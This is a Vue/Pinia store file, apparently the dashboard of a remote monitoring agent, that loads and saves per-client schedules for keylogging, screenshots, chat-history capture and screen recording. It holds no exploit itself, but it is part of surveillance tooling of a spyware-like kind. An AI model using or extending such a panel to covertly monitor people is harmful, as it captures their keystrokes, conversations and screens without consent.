import { axios_instance } from "@/api/api";
import { router } from "@/router/router";
import { defineStore } from "pinia";
import { ref, watch, type Ref } from "vue";
import { toast } from "vue3-toastify";
import { use_client_detail } from "../useClientDetail";

interface schedule_setting {
  id: string | undefined;
  type: string;
  start_after: number;
  schedule: number;
  // record only: recording duration (seconds) and auto | manual mode
  duration?: number;
  mode?: string;
}

export const use_client_setting = defineStore("client_setting", () => {
  const loading = ref<{ [key: string]: boolean }>({
    key_logger: false,
    screenshot: false,
    record: false,
  });
  const is_changed = ref<{ [key: string]: boolean }>({
    key_logger: false,
    screenshot: false,
    chat_history: false,
    record: false,
  });
  const keylogger_setting = ref<schedule_setting>({
    id: undefined,
    type: "key_logger",
    start_after: 0,
    schedule: 0,
  });
  const screenshot_setting = ref<schedule_setting>({
    id: undefined,
    type: "screenshot",
    start_after: 0,
    schedule: 0,
  });
  const chat_history_setting = ref<schedule_setting>({
    id: undefined,
    type: "chat_history",
    start_after: 0,
    schedule: 0,
  });
  const record_setting = ref<schedule_setting>({
    id: undefined,
    type: "record",
    start_after: 0,
    schedule: 0,
    duration: 5,
    mode: "auto",
  });

  const get_schedule_setting = (ref: Ref<schedule_setting>) => {
    loading.value[ref.value.type] = true;
    const data = JSON.stringify({
      agent_id: router.currentRoute.value.params.client_id,
      type: ref.value.type,
    });

    const config = {
      method: "post",
      maxBodyLength: Infinity,
      url: "/api/v1/view/config",
      headers: {
        "Content-Type": "application/json",
      },
      data: data,
    };

    axios_instance
      .request<{
        data: schedule_setting;
      }>(config)
      .then((response) => {
        ref.value = response.data.data;
        is_changed.value[ref.value.type] = false;
      })
      .catch((error) => {
        toast.error(error);
      })
      .finally(() => {
        loading.value[ref.value.type] = false;
      });
  };

  const save_schedule_setting = (setting: schedule_setting) => {
    loading.value[setting.type] = true;
    if (!setting.id) {
      toast.error("id không hợp lệ");
      return;
    }

    const data = JSON.stringify({
      enable: true,
      start_after: setting.start_after,
      schedule: setting.schedule,
      // record only: recording duration (seconds) and auto | manual mode
      ...(setting.duration !== undefined && { duration: setting.duration }),
      ...(setting.mode !== undefined && { mode: setting.mode }),
    });

    const config = {
      method: "post",
      maxBodyLength: Infinity,
      url: `/api/v1/view/config/${setting.id}`,
      headers: {
        "Content-Type": "application/json",
      },
      data: data,
    };

    axios_instance
      .request(config)
      .then(() => {
        toast.success("Lưu thông tin thành công");
      })
      .catch((error) => {
        toast.error(error);
      })
      .finally(() => {
        loading.value[setting.type] = false;
      });
  };

  const client_store = use_client_detail();

  watch(
    () => client_store.client_detail,
    (client_detail) => {
      if (!client_detail) return;
      if (client_detail.uninstalled) return;

      get_schedule_setting(keylogger_setting);
      get_schedule_setting(screenshot_setting);
      get_schedule_setting(chat_history_setting);
      get_schedule_setting(record_setting);
    },
    { immediate: true },
  );

  const has_permission = (permission: string): boolean => {
    return (
      use_client_detail().client_detail?.permissions?.includes(permission) ??
      false
    );
  };

  return {
    loading,
    is_changed,
    keylogger_setting,
    screenshot_setting,
    chat_history_setting,
    record_setting,
    save_schedule_setting,
    has_permission,
  };
});
